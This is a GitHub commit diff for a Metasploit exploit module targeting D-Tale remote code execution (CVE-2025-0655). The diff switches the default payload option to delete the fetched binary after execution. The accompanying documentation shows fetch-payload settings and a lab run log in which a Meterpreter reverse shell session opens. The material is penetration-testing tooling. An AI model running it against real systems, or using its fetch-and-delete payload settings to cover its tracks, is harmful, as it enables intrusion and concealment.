Skip to content

Commit 47351e4

Browse files
committed
Use FETCH_DELETE as default
1 parent 65d2b63 commit 47351e4

File tree

2 files changed

+5
-5
lines changed

2 files changed

+5
-5
lines changed

documentation/modules/exploit/linux/http/dtale_rce_cve_2025_0655.md

Lines changed: 4 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -61,8 +61,8 @@ Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):
6161
Name Current Setting Required Description
6262
---- --------------- -------- -----------
6363
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
64-
FETCH_DELETE false yes Attempt to delete the binary after execution
65-
FETCH_FILELESS true yes Attempt to run payload without touching disk, Linux ≥3.17 only
64+
FETCH_DELETE true yes Attempt to delete the binary after execution
65+
FETCH_FILELESS false yes Attempt to run payload without touching disk, Linux ≥3.17 only
6666
FETCH_SRVHOST no Local IP to use for serving payload
6767
FETCH_SRVPORT 8080 yes Local port to use for serving payload
6868
FETCH_URIPATH no Local URI to use for serving payload
@@ -74,7 +74,7 @@ Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):
7474
7575
Name Current Setting Required Description
7676
---- --------------- -------- -----------
77-
FETCH_FILENAME vxItPQvVMkW no Name to use on remote system when storing payload; cannot contain spaces or slashes
77+
FETCH_FILENAME agAyokIhdJZ no Name to use on remote system when storing payload; cannot contain spaces or slashes
7878
FETCH_WRITABLE_DIR /tmp yes Remote writable dir to store payload; cannot contain spaces
7979
8080
@@ -94,7 +94,7 @@ msf6 exploit(linux/http/dtale_rce_cve_2025_0655) > run lhost=192.168.56.1 rhost=
9494
[+] The target appears to be vulnerable. Version 3.15.1 detected.
9595
[*] Use data_id: 1
9696
[*] Updated the enable_custom_filters to true.
97-
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.17:34796) at 2025-03-01 11:37:14 +0900
97+
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.17:33210) at 2025-03-03 20:49:53 +0900
9898
[*] Successfully executed the payload.
9999
[*] Successfully cleaned up data_id: 1
100100

modules/exploits/linux/http/dtale_rce_cve_2025_0655.rb

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -51,7 +51,7 @@ def initialize(info = {})
5151
],
5252
],
5353
'DefaultOptions' => {
54-
'FETCH_FILELESS' => true
54+
'FETCH_DELETE' => true
5555
},
5656
'DefaultTarget' => 0,
5757
'Payload' => {

0 commit comments

Comments
 (0)